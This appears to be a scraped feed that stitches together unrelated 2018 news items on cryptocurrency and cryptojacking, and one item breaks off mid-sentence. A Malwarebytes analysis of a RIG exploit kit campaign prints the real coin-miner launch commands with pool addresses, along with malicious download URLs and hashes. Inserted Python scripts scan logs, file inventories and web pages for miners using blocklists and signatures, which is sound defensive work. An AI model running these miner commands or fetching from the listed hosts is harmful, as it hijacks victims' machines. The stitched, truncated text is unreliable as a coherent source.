This is a part of a larger initiative called KODAKOne which will reportedly give photographers a new revenue stream and a secure work platform. The blockchain-powered image management system will supposedly create a digital ledger of rights ownership that photographers can use to register and license new and old work.

Kodak CEO Jeff Clarke said in a statement, “For photographers who’ve long struggled to assert control over their work and how it’s used, these buzzwords [“blockchain” and “cryptocurrency”] are the keys to solving what felt like an unsolvable problem.”

Kodak’s choice to move towards blockchain rather than introduce a new social media platform to serve the same purpose has sparked some discussions that the company is trying to capitalise on the current cryptocurrency fad.

KODAKCoin’s initial coin offering opens on January 31st, under SEC guidelines as a security token, and it’s open to US, UK, Canadian, and other investors.

Further information can be obtained on their website.

Tank-traps versus trappings in virtual currencies: A cybersecurity minefield

Bitcoin, the progenitor of the entire cryptocurrency boom and still the most popular virtual currency, experienced a truly heady run-up in value. Its price surge was punctuated with a crescendo midway through December, when a single bitcoin approached $20,000.

The post Tank-traps versus trappings in virtual currencies: A cybersecurity minefield appeared first on WeLiveSecurity

RIG exploit kit campaign gets deep into crypto craze

There isn’t a day that goes by without a headline about yet another massive spike in Bitcoin valuation, or a story about someone mortgaging their house to purchase the hardware required to become a serious cryptocurrency miner.

If many folks are thinking about joining the ‘crypto craze’ movement, they may be surprised to learn that they already have. We’ve documented in-browser miners before on this blog, or what we call drive-by cryptomining, but drive-by download attacks such as those via the RIG exploit kit want a piece of the action, too. While the latter is not a new trend, we have noticed an increase in malware payloads from EKs that are coin miners, and we think this is going to be something to follow for 2018.

Overview

Today, we take a look at a prolific campaign that is focused on the distribution of coin miners via drive-by download attacks. We started to notice larger-than-usual payloads from the RIG exploit kit around November 2017, a trend that has continued more recently via a campaign dubbed Ngay.

What happened is that the initial dropper contained additional binaries, which accounts for its oversized nature as depicted below. Droppers from this campaign have consistently contained one or more coin miners, for Monero at least and also for lesser-known but still popular currencies such as Bytecoin.

One payload leads to two different coin miners.

For the same attack, these two processes will mine for the well-known Monero and Electroneum cryptocurrencies. When both executables are running, the CPU usage on the victim’s computer is maxed at 100 percent.

Distribution

The Ngay campaign, identified as such by Nao_Sec, is one of several malvertising chains that relies on the RIG exploit kit to distribute its payloads. Recently, we observed a more complex redirection chain involving bestadbid and various XML feeds upstream, eventually trickling down to the more familiar redirect to RIG.

Infection flow showing redirection to RIG EK, followed by coin miner payloads

iframe to RIG EK is inserted in Ngay’s template page

The dropped binary from RIG EK contains two other artifacts that each lead to a different coin miner and are launched in a rather unusual procedure. In the following sections, we will study their deployment mechanism.

Monero miner

Monero is one of the most well-known digital currencies; contrary to Bitcoin, it does not require special hardware and provides additional privacy benefits. Threat actors have jumped on it via large-scale drive-by mining attacks, with the help of coin miner-purposed malware.

Here the Monero miner is downloaded after a convoluted process that also aims at registering it permanently as a running service. The extracted binary from the RIG EK payload (3yanvarya.exe) is an installer that drops several .NET modules:

.NET modules extracted from one of the two artifacts contained in RIG EK’s payload

starter.exe uses an exploit (Invoke-MS16-032) copied from this GitHub repository (It even re-uses the original license!) to elevate privileges:

Code snippet showing PowerShell code designed to elevate privileges

foxcon.exe contains two sub-modules inside: Hydra and Hand, which purport to protect and manage services:

Hydra and Hand: two modules in charge of miner services

services.exe is a service to download and manage the miner:

Miner is downloaded from a remote IP address

Finally, the Monero miner (series64.exe) is retrieved and can start the mining activity. The overall process can be summarized in the diagram below.

"C:\Windows\TEMP\series64.exe" -o 5.23.48.207:5555 -u x -p x -k -B --max-cpu-usage=30 --safe

Overview of the Monero miner deployment

Electroneum miner

Electroneum, the “mobile friendly” digital currency, has only been recently introduced but became popular almost immediately. The Android app allows anyone to mine and manage their wallet, but miners running desktop platforms can also participate.

Malware authors are abusing it via a malicious coin miner binary that is dropped from dp.exe in yet another unusual redirection chain. Indeed, it involves the Bit.ly URL shortener to retrieve a fake PNG image containing instructions for the download and eventual launch of the miner itself.

"C:\Users\[username]\AppData\Roaming\bvhost\bvhost.exe" -o etn-eu2.nanopool.org:13333 -u etnkKc…

Overview of the Electroneum miner deployment
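Both command lines above share the same shape: a `-o host:port` pool argument, optional XMRig-style tuning flags, and a binary launched from TEMP or a user profile directory. The script below turns those traits into a detection run over process-creation log lines. It is an added example, not Malwarebytes' code; the log layout (`timestamp host pid command-line`) is constructed, the wallet in the second line is a placeholder, and the list of stratum ports beyond the 5555 and 13333 seen above is an assumption.

```python
"""Flag coin-miner process launches in process-creation logs.

Added example, not Malwarebytes' code. Heuristics come from the two command
lines in the article: a '-o host:port' pool argument, XMRig-style flags, and a
binary launched from TEMP or AppData. The log layout is constructed; stratum
ports other than 5555 and 13333 are assumed.
"""
import re

# '-o host:port' or '-o stratum+tcp://host:port'
POOL_OPT = re.compile(r"(?:^|\s)-o\s+(?:stratum\+tcp://)?([\w.\-]+):(\d{2,5})\b")
# Pool domain seen in the article, plus ports commonly used by stratum pools
# (assumption; 5555 and 13333 come from the article's command lines).
POOL_DOMAINS = ("nanopool.org",)
STRATUM_PORTS = {3333, 4444, 5555, 13333, 14444}
MINER_FLAGS = ("--max-cpu-usage", "--safe", "--donate-level", "-k", "-B")
SUSPICIOUS_DIRS = (r"\windows\temp", r"\appdata\roaming", r"\appdata\local\temp")

# Constructed log lines: the two launches described in the article plus two
# benign processes that also use '-o' or '-k'. The ETN wallet is a placeholder.
SAMPLE_LOG = [
    r'2018-01-03T10:02:11Z WS01 4628 "C:\Windows\TEMP\series64.exe" -o 5.23.48.207:5555 -u x -p x -k -B --max-cpu-usage=30 --safe',
    r'2018-01-03T10:02:15Z WS01 4660 "C:\Users\alice\AppData\Roaming\bvhost\bvhost.exe" -o etn-eu2.nanopool.org:13333 -u ETN_WALLET_PLACEHOLDER',
    r'2018-01-03T10:05:40Z WS01 4702 "C:\Program Files\curl\curl.exe" -k -o report.json https://intranet.example.invalid/api',
    r'2018-01-03T10:06:02Z WS01 4710 "C:\Windows\System32\OpenSSH\ssh.exe" -o ServerAliveInterval=60 build01',
]


def miner_reasons(cmdline: str) -> list:
    """Return the heuristics a command line trips; an empty list means clean."""
    reasons = []
    m = POOL_OPT.search(cmdline)
    if m:
        host, port = m.group(1), int(m.group(2))
        reasons.append(f"pool argument -o {host}:{port}")
        if host.lower().endswith(POOL_DOMAINS) or port in STRATUM_PORTS:
            reasons.append("known mining pool domain or stratum port")
    # Compare flag names only, so '--max-cpu-usage=30' still matches.
    args = [a.split("=", 1)[0] for a in cmdline.split()]
    reasons.extend(f"miner flag {f}" for f in MINER_FLAGS if f in args)
    if any(d in cmdline.lower() for d in SUSPICIOUS_DIRS):
        reasons.append("binary runs from a temp or profile directory")
    return reasons


def is_miner(cmdline: str) -> bool:
    """A pool argument is required; at least two further indicators confirm,
    which keeps lone '-k' or '-o' uses (curl, ssh) from firing."""
    reasons = miner_reasons(cmdline)
    return any(r.startswith("pool argument") for r in reasons) and len(reasons) >= 3


def scan_process_log(lines) -> list:
    """Parse 'timestamp host pid cmdline' lines and return the flagged ones."""
    hits = []
    for line in lines:
        ts, host, pid, cmdline = line.split(None, 3)
        if is_miner(cmdline):
            hits.append({"time": ts, "host": host, "pid": int(pid),
                         "cmdline": cmdline, "reasons": miner_reasons(cmdline)})
    return hits


if __name__ == "__main__":
    for hit in scan_process_log(SAMPLE_LOG):
        print(hit["pid"], hit["reasons"])
```

Requiring the pool argument plus two more indicators is what keeps the benign `curl -k -o` and `ssh -o` lines quiet; tune the port and directory lists to the environment rather than relying on the flag names alone, since those are trivial for a loader to change.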

Conclusion

As cryptocurrencies become more and more popular, we can only expect to see an increase in malicious coin miners, driven by the prospect of financial gains and increased anonymity. As the mining process has become cross-platform and achievable using regular computers, this has opened new possibilities for threat actors. Indeed, they can put hundreds of thousands of compromised machines to work mining for the latest and hottest digital currency around.

For end users, the threat of a coin miner infection may seem less impactful than, say, a banking Trojan, but perhaps that is only true in the short term. Not only can existing malware download additional payloads over the course of time, but the illicit gains from cryptomining contribute to financing the criminal ecosystem, costing billions of dollars in losses.

This particular RIG EK campaign is noteworthy for its focus on cryptominers and the way it unconventionally and at times inefficiently loads them. We will keep monitoring the drive-by download landscape to report on any change in payloads from other threat actors.

Many thanks to @hasherezade for help studying the binaries.

Indicators of compromise

RIG EK dropper

FD4A117EDFEA1075132CF7D0A2AD5376B174AFD1C924D91E9B0D124320E3177D

Redirections to downloader script

5.101.179.249
*.lolkekss[.]us
bit[.]ly/2lXCGUy

Downloader script for Electroneum miner (fake PNG)

lolkekss.usite[.]pro/DF.png
195.216.243.130

Electroneum miner (bvhost.exe)

74.115.50.111
115776615-884492032168661957.preview.editmysite[.]com/uploads/1/1/5/7/115776615/be
13CE8C6C8E9E4A06880A5F445A391E9E26BB23FCD0C6F4CC495AA5B80E626C0B

Monero miner (series64.exe)

188.225.46.219:3000/files/mh/series64.exe
F651B1C5AE7B55B765994EB6630C45A0A7F1E43EBABD801CB8B3B26BDDB09D17

Additional miner loaders via RIG EK (SHA256, size in bytes, date found):

24ff04ef166cbc94d88afd0c7a3cba78dfe2f2d9e02a273a60fcc45ced5cb484,1732969,2017-12-29
d68c5095bd7b82e28acd4df5514a54db6d6d340ada860b64b932cb014fe1ecb3,1513983,2018-01-02
5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424f,1732965,2018-01-02
2876ceb760c5b37e03ebb3cabbfb25a175e8c3556de89af9dd9941fda183bc79,1840725,2018-01-03
bba35503156eee0aa6ecef7aa76bbe3e6d26791585aac328f895278cd1c09cb2,2819600,2018-01-04
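The loader list above is published as `SHA256,size,date` triples, which is a convenient shape to feed a matcher directly. The parser and matcher below are an added example, not Malwarebytes' code: `IOC_TEXT` reproduces the five entries above verbatim, while the file inventory it is matched against is constructed for the demonstration.

```python
"""Parse a 'SHA256,size in bytes,date found' IoC list and match it against a
file inventory.

Added example, not Malwarebytes' code. IOC_TEXT reproduces the five entries
published in the article; the inventory is constructed for the demonstration.
"""
import re
from datetime import date

HASH_RE = re.compile(r"^[0-9a-f]{64}$")

IOC_TEXT = """\
# Additional miner loaders via RIG EK (SHA256, size in bytes, date found)
24ff04ef166cbc94d88afd0c7a3cba78dfe2f2d9e02a273a60fcc45ced5cb484,1732969,2017-12-29
d68c5095bd7b82e28acd4df5514a54db6d6d340ada860b64b932cb014fe1ecb3,1513983,2018-01-02
5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424f,1732965,2018-01-02
2876ceb760c5b37e03ebb3cabbfb25a175e8c3556de89af9dd9941fda183bc79,1840725,2018-01-03
bba35503156eee0aa6ecef7aa76bbe3e6d26791585aac328f895278cd1c09cb2,2819600,2018-01-04
"""

# Constructed inventory: (path, sha256, size) as an endpoint agent might report.
# The first hash is one of the published loaders, reported in upper case to
# show that matching is case-insensitive; the second is a stand-in for a clean file.
SAMPLE_INVENTORY = [
    (r"C:\Users\alice\Downloads\setup.exe",
     "2876ceb760c5b37e03ebb3cabbfb25a175e8c3556de89af9dd9941fda183bc79".upper(), 1840725),
    (r"C:\Program Files\Vendor\app.exe",
     "0000000000000000000000000000000000000000000000000000000000000000", 4096),
]


def parse_ioc_list(text: str) -> list:
    """Turn the comma-separated list into validated records. Blank lines and
    '#' comments are skipped; a malformed line raises instead of being
    silently dropped, so a broken feed cannot quietly blind the matcher."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected 3 fields, got {len(parts)}")
        sha256, size, found = parts
        sha256 = sha256.lower()
        if not HASH_RE.match(sha256):
            raise ValueError(f"line {lineno}: not a SHA-256 hex digest")
        records.append({"sha256": sha256, "size": int(size),
                        "found": date.fromisoformat(found)})
    return records


def match_inventory(records: list, inventory: list) -> list:
    """Match files by SHA-256 (case-insensitive). The size is checked too: a
    hash hit with a different size means the feed entry or the inventory
    record is wrong, which is worth surfacing rather than hiding."""
    by_hash = {r["sha256"]: r for r in records}
    hits = []
    for path, sha256, size in inventory:
        rec = by_hash.get(sha256.lower())
        if rec is None:
            continue
        hits.append({"path": path, "sha256": rec["sha256"],
                     "size_consistent": size == rec["size"],
                     "ioc_date": rec["found"].isoformat()})
    return hits


if __name__ == "__main__":
    iocs = parse_ioc_list(IOC_TEXT)
    for hit in match_inventory(iocs, SAMPLE_INVENTORY):
        print(hit)
```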

The post RIG exploit kit campaign gets deep into crypto craze appeared first on Malwarebytes Labs.

Someone hacked Blackberry to steal computing power for mining cryptocurrency [Updated]

Cryptocurrency mining service Coinhive is again in the news for misuse by a customer, this time involving handset maker Blackberry. Apparently, someone hacked into the company’s global operations website and used it to steal visitors’ computing power to mine Monero – a digital currency.

Cryptocurrencies like Bitcoin, Ethereum and Monero are digital currencies whose number and/or value grows as new transactions are validated by solving complex mathematical problems. Lending your computing power to keep the blockchain alive increases the currency’s value, and also fattens your personal crypto wallet, but only if you can mine quickly enough – which requires immense computing resources, especially for the likes of Bitcoin.

Coinhive sells a cryptocurrency mining tool that allows users to embed it in a desired platform – such as a website – and mine Monero using visitors’ computing power. It advertises the tool as a more elegant alternative to displaying intrusive ads. Currently, one Monero unit is valued at around $400.

But there’s a problem with Coinhive. The service is apparently so alluring to fast-buck aficionados that it has become a one-stop-shop for bad actors. The latest such incident was reported on Reddit, where a user nicknamed “Rundvleeskroket” revealed that Blackberry was hacked for cryptocurrency mining.

A friend of Rundvleeskroket discovered the hack, and shared a screenshot of the Blackberry site’s source code where Coinhive is clearly referenced. A spokesperson for Coinhive soon joined the discussion and confirmed that someone indeed had hacked Blackberry, and a number of other sites, and used their tool for the reported nefarious purpose.
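The hack was spotted by someone reading the site's source and recognising the Coinhive reference. The scanner below does that reading automatically over page source. It is an added example, not code from the post or from Coinhive: the host list is limited to coinhive.com and authedmine.com (both named on this page), the `CoinHive.Anonymous` / `CoinHive.User` constructor names are an assumption about the library's API, and the HTML, including the site key, is constructed.

```python
"""Scan page source for references to in-browser miners such as Coinhive.

Added example, not code from the post or from Coinhive. External <script src>
hosts are checked against a short list, and inline scripts are searched for
the miner API being instantiated. The host list is an assumption beyond the
names on this page, as are the API names; the HTML is constructed.
"""
import re
from html.parser import HTMLParser

KNOWN_MINER_HOSTS = ("coinhive.com", "authedmine.com")
# Constructor names the injected snippet would call (assumption about the API).
MINER_API = re.compile(r"\bCoinHive\.(?:Anonymous|User)\s*\(")

# Constructed page: one ordinary script, one injected loader, one inline start.
SAMPLE_HTML = """\
<html><head>
<script src="https://cdn.example.invalid/analytics.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</head><body><p>Welcome</p></body></html>
"""


class MinerScriptScanner(HTMLParser):
    """Collect (kind, evidence) tuples for suspicious script tags."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        self._in_script = True
        src = (dict(attrs).get("src") or "").lower()
        # Match on the host part only, so a look-alike path does not fool it
        # and a subdomain of a listed host is still caught.
        host = src.split("://", 1)[-1].split("/", 1)[0]
        if host and any(host == h or host.endswith("." + h) for h in KNOWN_MINER_HOSTS):
            self.findings.append(("external-script", src))

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands a <script> body over as data; inspect it for the API.
        if self._in_script:
            m = MINER_API.search(data)
            if m:
                self.findings.append(("inline-script", m.group(0)))


def scan_html(html: str) -> list:
    scanner = MinerScriptScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, evidence in scan_html(SAMPLE_HTML):
        print(kind, evidence)
```

Pointing this at a site's own rendered pages on a schedule catches the case in the post, where the injected script sat in the page for anyone to read; it will not see a miner loaded later by another script, so pair it with the CPU-usage and network indicators the vendors mentioned below rely on.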

“We’re sorry to hear that our service has been misused. This specific user seems to have exploited a security issue in the Magento web shop software (and possibly others) and hacked a number of different sites,” the representative said.

Ironically, Blackberry claims to be offering the “world’s most trusted mobile security software.”

Security vendors, including Bitdefender, classify cryptocurrency miners as malware, and block them. Although Coinhive states that customers should warn their end-users of the practice, many prefer to keep their mining a secret.

The past year has seen several reports of concealed cryptocurrency mining – almost all of them involving Coinhive.

In September last year, The Pirate Bay notably ran what it called a “test pilot program” to see if mining Monero worked as an alternative to displaying ads. A month later, an engineer discovered a hidden cryptocurrency miner inside a popular Google Chrome URL shortening extension.

Oslo-based Opera Software AS recently rolled out a new version of its web browser, featuring an anti-Bitcoin mining tool. Browser extensions serving the same purpose are available for Google Chrome users as well.

Update:

BlackBerryMobile.com is operated by TCL Communication, which manufactures, markets and sells BlackBerry Android smartphones globally under a brand licensing agreement with BlackBerry Limited. Soon after this story hit the wires, a Blackberry spokesperson reached out to us to clarify some matters.

“Recently, BlackBerry Limited was alerted by a third party of an exploited security vulnerability affecting the BlackBerryMobile.com site,” the spokesperson said. “Upon notification and our own verification, BlackBerry Limited moved quickly to communicate with our partner at TCL and to temporarily redirect our links to BlackBerryMobile.com to BlackBerry.com pages.”

The representative insisted that “At no time was BlackBerry.com compromised,” adding that “TCL has restored a new site with partial content and is collaborating with BlackBerry Limited to harden its site to prevent future cyberattacks.”

A Mysterious Malware That Holds The Power To Critically Damage One’s Phone

It wouldn't be wrong to state that Hack Forums isn't the most "world class" or elite gathering of cybercriminals, as many of its members currently appear to be relative novices, and it's probable that some post about hacking methods they've never actually attempted. Even so, experts do state that with the current boom in cryptocurrencies, even sophisticated hacking groups are increasingly getting into covert, or in other words clandestine, mining, and sometimes run such operations alongside more traditional cybercrime like data theft and denial of service attacks.

Like many other people, the hackers on the message board Hack Forums are currently exchanging tips on how to make a profit with cryptocurrencies. But they're not simply hoping to buy low and sell high: they are also swapping ways to surreptitiously harness other people's phones and PCs to generate digital coins for themselves.

A month ago, F5 Networks, a Seattle security firm, reported a "sophisticated multi-stage attack" hijacking networks of computers to mine cryptocurrencies.

The attackers have been known to use vulnerabilities in common server software, combined with Windows exploits leaked from the National Security Agency, to infiltrate victims' systems with little effort and move through their networks.

Although it is difficult to know how much these recent cryptojacking attacks have earned altogether, the addresses linked to the malware variants appear to have received a total of $68,500 in the cryptocurrency Monero.

In the past year, Monero-mining malware has been spotted on a wide variety of sites, mining the currency as people streamed videos from Showtime and the Ultimate Fighting Championship or simply browsed the web on compromised Wi-Fi networks at Starbucks cafes. Some browser extensions have also been found mining the currency while users do other things, and Monero-mining malware has recently been spotted spreading through links on Facebook Messenger as well.

Hi @Starbucks @StarbucksAr did you know that your in-store wifi provider in Buenos Aires forces a 10 second delay when you first connect to the wifi so it can mine bitcoin using a customer’s laptop? Feels a little off-brand...

— Noah Dinkin (@imnoah) December 2, 2017

“If you remember the IoT botnets, Mirai in the past, we’ve actually seen one variant this year which was mining monero coins on routers and hard disk recorders as well,” says Candid Wueest, principal threat researcher at Symantec and contributing author on a report the security company released on cryptojacking last month.

Creators of some monero-mining software argue that in-browser mining can have a legitimate use, letting people intentionally exchange computer power for access to articles, videos, or premium application features, as sites look beyond advertising as a revenue stream. "I don't agree with anybody's computer being mishandled or abused without their insight," says Spagni, the monero core developer.

"However the technology that is being manhandled presents a completely new approach for monetizing a service on the web." He contends this could empower a "free" version of Netflix or provide another subsidizing stream for journalism.

Coinhive, one of the best-known web miners, even offers a mining-based captcha alternative aimed at making it harder for spammers to perform certain actions on a website, and a version of the software called AuthedMine which requires users to explicitly opt in before mining begins. Makers of other mining tools make similar statements about user consent, perhaps with varying degrees of sincerity.

Nevertheless, a tool called Monero Quiet Excavator, available for $14, mines in the background on Windows PCs. It doesn't open a visible window that users could readily notice, keeps the device from going into sleep mode, and can "bypass firewalls," according to its website. Its developer states that it is intended only for "legitimate users". Those could include people who own multiple PCs and want to use them to mine monero "transparently for the end user or client of the PC".

CoffeeMiner PoC Targets Public Wi-Fi Networks to Mine for Cryptocurrency

A recently published proof-of-concept notes that it could be possible for attackers to hijack coffee shop Wi-Fi networks and get connected users to mine cryptocurrencies, according to software developer Arnau Code.

A couple of weeks ago, an incident at a Starbucks coffee shop saw customers' machines mining cryptocurrency; it seems the internet service provider that offered the Wi-Fi connectivity was at fault, which suggests attackers physically present in a coffee shop could hijack the network in the same way. Arnau pulled off the proof-of-concept by performing a man-in-the-middle attack: he redirected all customers through his proxy via ARP spoofing, then injected a single line of code into visited HTML pages that calls the cryptocurrency miner in the victim’s browser.

“The objective is to have a script that performs an autonomous attack on the WiFi network,” wrote Arnau. “It’s what we have called CoffeeMiner, as it’s a kind of attack that can be performed in cafés’ WiFi networks.”

Although the attack requires the cybercriminal to actually be present in the coffee shop and have a strong enough Wi-Fi antenna so that it can hijack traffic from as many clients as possible, the attack does seem plausible, provided the targeted router or switch lacks built-in ARP-spoofing protection.

Leveraging the same CoinHive cryptocurrency mining JavaScript used by The Pirate Bay or some rogue Google Chrome extensions, Arnau does point out that, for the mining to yield positive results, the victim needs to visit the affected website for more than 40 seconds per session.

“CoinHive miner makes sense when a user stays on a website for mid-long term sessions. So, for example, for a website where the users’ average session is around 40 seconds, it doesn’t make much sense,” reads the blog post. “In our case, as we will inject the crypto miner in each one of the HTML pages that victims request, we will have long-term sessions to calculate hashes to mine Monero.”

The developer suggests that adding more automation to his proof-of-concept could increase its effectiveness, although the project has been tagged “for academic purposes only”.

Bitcoin loses ground; hackers opt for other encrypted digital currencies

Bitcoin’s popularity is waning as alternatives such as Stellar, ZCash or monero climb the cybercriminals’ preferred list. Hackers are switching to other cryptocurrencies that law enforcement may be less familiar with, so chances of detecting crime or money laundering related transactions decrease. ZCash and monero, for example, allegedly bring better encryption and privacy features to the table.

“The two most well-known cryptocurrencies are considered too expensive for most new entrants. Despite being able to purchase a fraction of each, there is a real psychological barrier around owning something in its entirety,” explained for CNBC Dave Chapman, managing director at trading house Octagon Strategy.

At a total value of more than $750 billion, bitcoin covers 36 percent of the cryptocurrency market, leaving plenty of room for others like litecoin, ethereum, ripple, dash and monero to grow in market capitalization. Bitcoin’s market share dropped from last month’s 56 percent, while ethereum’s share has tripled.

“With the Ethereum blockchain reaching 1 million transactions per day, and both Ethereum and other blockchain projects frequently reaching their full transaction capacity, the need for scaling progress is becoming more and more clear and urgent,” announced ethereum founder Vitalik Buterin.

As a result, “two experimental subsidy schemes” will be started to “tie into and improve Ethereum’s scalability.”

Even Dogecoin, a new cryptocurrency created as a joke, has grown in popularity, reaching a market cap of over $1 billion in January.

According to Bloomberg, analytic firms are paying more attention to transactions and are improving techniques to detect illicit activity and transactions.

“The altcoins today, in large part, are not trying to be bitcoin competitors,” said Lex Sokolin, global director of fintech strategy at Autonomous Research LLP in London. “They are doing something else entirely — ethereum as a smart-contracts platform, iota as a machine-economy token, ripple for interbank payments, and so on.” Their use “should become increasingly relevant as the novelty of crypto wears off.”

Opera Offers First Built-In Cryptojacking Protection Tool

Browser-makers are finally starting to fight back against the bitcoin mining threat. According to ZDNet, the beta version of Opera 50 is the first major browser to offer a built-in mechanism that blocks cryptojacking, a new form of malware that leverages the victim’s computer to mine cryptocurrency without permission.

The new antimining tool, called NoCoin, is part of the ad blocker function in Opera. It is disabled by default but can be enabled through the Settings or Preferences page. According to an Opera blog post, the tool blocks cryptocurrency mining scripts just as an ad blocker would disable banner ads and pop-ups.

The Danger of Cryptojacking

Without a tool such as NoCoin, a cryptocurrency miner might go undetected until the central processing unit (CPU) usage dramatically increased for no obvious reason, preventing the victim from executing his or her own programs.

Coinhive was the first such malware to hit the web in September, Bleeping Computer reported. The JavaScript code mines for Monero using the victim’s CPU resources. It was initially presented as a way for site owners to bypass the need to display ads for revenue. Pirate Bay was one of the first to use Coinhive for this purpose, but the torrent site removed it in response to user outcry.

Researchers have also observed attempts to hide JavaScript cryptominers using covert pop-under windows, ZDNet reported. This enables fraudsters to continue using the victim’s CPU even after the user has navigated away from the website. Some crafty criminals even integrated JavaScript miner scripts right into their fake security warning browser lock screens.
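The CoffeeMiner write-up above describes the injection as a single line of HTML that pulls in a miner script, and the NoCoin description says the blocker treats mining scripts the way an ad blocker treats banners. As an added example (not code from this page, from Opera, or from Coinhive), here is a small Python scanner of the kind a web proxy or content filter could run over pages it serves: it checks every external script's host against a blocklist, and every inline script body against a couple of API signatures. Only coinhive.com is a real host; the second blocklist entry, the sample portal page and its site key are constructed for the example, and the CoinHive.Anonymous constructor and throttle option are taken from Coinhive's public JavaScript API as it was documented at the time.

```python
"""Flag browser-mining scripts in an HTML document (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts whose scripts get blocked. coinhive.com was Coinhive's real domain;
# the second entry is a constructed placeholder for any other listed host.
MINER_HOSTS = {"coinhive.com", "miner.blocklist-example.invalid"}

# Inline-script signatures. CoinHive.Anonymous / CoinHive.User were the
# constructors of Coinhive's public JavaScript API; the throttle pattern
# catches the hash-rate option that the same API took.
INLINE_SIGNATURES = {
    "coinhive-api": re.compile(r"\bCoinHive\.(Anonymous|User)\s*\("),
    "throttle-option": re.compile(r"\bthrottle\s*:\s*0?\.\d+"),
}


def host_is_blocked(src, blocklist=MINER_HOSTS):
    """True if the script URL's host is a listed host or a subdomain of one."""
    host = (urlparse(src).hostname or "").lower()
    return any(host == b or host.endswith("." + b) for b in blocklist)


class MinerScriptScanner(HTMLParser):
    """Collects (line, reason, evidence) for every suspicious <script>."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script_line = None   # line of the open <script> tag, if inside one
        self._script_body = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._script_line = self.getpos()[0]
        self._script_body = []
        src = dict(attrs).get("src")
        if src and host_is_blocked(src):
            self.findings.append((self._script_line, "blocked-host", src))

    def handle_data(self, data):
        # Script bodies can arrive in several chunks; buffer until </script>.
        if self._script_line is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag != "script" or self._script_line is None:
            return
        body = "".join(self._script_body)
        for reason, pattern in INLINE_SIGNATURES.items():
            match = pattern.search(body)
            if match:
                self.findings.append((self._script_line, reason, match.group(0)))
        self._script_line = None
        self._script_body = []


def scan_html(html):
    """Return the list of findings for one HTML document."""
    scanner = MinerScriptScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: a cafe portal with a miner script injected the way the
# CoffeeMiner write-up describes. The site key is a placeholder.
SAMPLE_PAGE = """<html><head><title>Cafe portal</title>
<script src="https://cdn.example.net/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<p>Welcome, connect to our Wi-Fi.</p>
<script>
  var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""

if __name__ == "__main__":
    for line, reason, evidence in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {reason}: {evidence}")
```

Run against the sample page this reports the blocklisted script on line 3 and the inline miner on line 6 twice (once per signature). The host check deliberately matches subdomains but not look-alike domains such as coinhive.com.example.org, and the signature check is the part that Google's objection in the next section applies to: a mutated script that renames its constructor slips past it, which is why a blocklist of hosts is the more durable half of the two.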

Dusting for Fingerprints

Another Bleeping Computer article reported that Google has already looked at the service for its Chrome browser, but has rejected the idea of blacklisting or fingerprinting this kind of JavaScript action. The technology giant believes that a malware-laden site could easily mutate the script to bypass this mechanism.

While specific extensions can be added to browsers to help users avoid cryptomining, Opera’s built-in functionality makes this protection readily available.

The post Opera Offers First Built-In Cryptojacking Protection Tool appeared first on Security Intelligence.

CEO of Major UK-Based Cryptocurrency Exchange Kidnapped in Ukraine

Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukrainian capital of Kiev. According to Ukraine-based web publication Strana, Lerner, 40-year-old citizen of Russia, was kidnapped on December 26 when he was leaving his office in the center of town (located on the

Wall Street warming up to Bitcoin as Goldman Sachs sets up trading desk

Investment firm Goldman Sachs Group is about to dip a toe into the Bitcoin market, according to people familiar with the bank’s strategy. Bitcoin is heavily associated with cybercrime – in particular ransomware.

Goldman Sachs is setting up a trading desk to create markets in digital currencies, Bloomberg reports, citing two people with knowledge of the firm’s long-term plans.

“In response to client interest in digital currencies, we are exploring how best to serve them,” firm spokesman Michael DuVally told the news agency.

Goldman Sachs has set its sights on Bitcoin, a risky but potentially extremely profitable cryptocurrency that has captured the imagination of the world, including hackers. Cybercriminals love cryptocurrencies for one major advantage: anonymity.

The proliferation of ransomware – currently the #1 cyberthreat – was made possible partially thanks to digital currencies. After encrypting a victim’s computer, cyber crooks leave their Bitcoin wallet’s address on the screen demanding ransom be paid at that address in the form of cryptocurrency. While the public can see the wallet and its contents, no one knows who owns it.

Other popular “altcoins” (as they are collectively called) include Monero, Ethereum, Litecoin and Zcash – each with their respective valuation and unique pros and cons. However, no altcoin is more valuable than Bitcoin, currently trading at around $14,000 apiece.

But because it isn’t backed by any real assets, and because it is a cybercrime currency, Bitcoin is also highly volatile – making it a very risky affair for Wall Street. Just last week, Bitcoin peaked at an impressive $20,000 per coin.

Also worth noting, several cryptocurrency concerns have fallen victim to cyberattacks. NiceHash, the self-proclaimed “largest crypto-mining marketplace” lost $60 million to hackers earlier this month.

Perhaps not surprisingly then, banks like Citigroup and Bank of America have taken a wait-and-see approach.

Top Five Trends IT Security Pros Need to Think About Going into 2018

It’s that time of the year when we look back at the tech trends of 2017 to provide us with a hint of things to come. Accordingly, let’s engage in our favorite end-of-year pastime: predictions about the coming year.

Equipped with Imperva’s own research, interactions with our customers, and a wealth of crowdsourcing data analyzed from installations around the world, we’ve looked ahead to the future of cybersecurity and compiled a few significant trends IT security pros can expect to see in 2018.

Here are our top five predictions for 2018 and what you can do to prepare for them:

1. Massive Cloud Data Breach

